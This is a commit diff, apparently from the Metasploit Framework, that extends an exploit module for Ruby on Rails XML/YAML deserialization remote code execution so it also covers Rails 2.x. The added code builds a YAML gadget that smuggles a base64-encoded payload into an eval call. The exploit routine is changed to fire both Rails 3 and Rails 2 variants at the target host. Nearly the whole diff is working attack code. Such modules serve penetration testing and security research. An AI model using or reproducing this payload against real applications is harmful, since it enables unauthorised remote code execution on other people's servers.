Merge in Rails2 support now that its in master

HD Moore · HD Moore · commit 42ea64c21bdb · 2013-01-10T02:14:08.000-06:00
diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@@ -22,9 +22,7 @@ def initialize(info = {})
 				an attacker to instantiate a remote object, which in turn can be used to execute
 				any ruby code remotely in the context of the application.
 
-				This module has been tested across multiple versions of RoR 3.x, but does not yet
-				work against 2.x versions of RoR.
-
+				This module has been tested across multiple versions of RoR 3.x and RoR 2.x
 			},
 			'Author'         =>
 				[
@@ -85,7 +83,25 @@ def detached_payload_stub(code)
 	#
 	# Create the YAML document that will be embedded into the XML
 	#
-	def build_yaml
+	def build_yaml_rails2
+
+		# Embed the payload with the detached stub
+		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+		yaml =
+			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
+			"eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
+		yaml
+	end
+
+
+	#
+	# Create the YAML document that will be embedded into the XML
+	#
+	def build_yaml_rails3
 
 		# Embed the payload with the detached stub
 		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
@@ -101,7 +117,7 @@ def build_yaml
 	#
 	# Create the XML wrapper with any desired evasion
 	#
-	def build_request
+	def build_request(v)
 		xml = ''
 
 		elo = Rex::Text.rand_text_alpha(rand(12)+4)
@@ -120,7 +136,7 @@ def build_request
 
 		el = Rex::Text.rand_text_alpha(rand(12)+4)
 		xml << "<#{el} type='yaml'>"
-		xml << build_yaml
+		xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
 		xml << "</#{el}>"
 
 		if datastore['XML::PadElement']
@@ -142,13 +158,22 @@ def build_request
 	# Send the actual request
 	#
 	def exploit
-		data = build_request
-		print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
+
+		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
+		res = send_request_cgi({
+			'uri'    => datastore['URIPATH'] || "/",
+			'method' => datastore['HTTP_METHOD'],
+			'ctype'  => 'application/xml',
+			'data'   => build_request(3)
+		}, 25)
+		handler
+
+		print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
 		res = send_request_cgi({
 			'uri'    => datastore['URIPATH'] || "/",
 			'method' => datastore['HTTP_METHOD'],
 			'ctype'  => 'application/xml',
-			'data'   => data,
+			'data'   => build_request(2)
 		}, 25)
 		handler
 	end
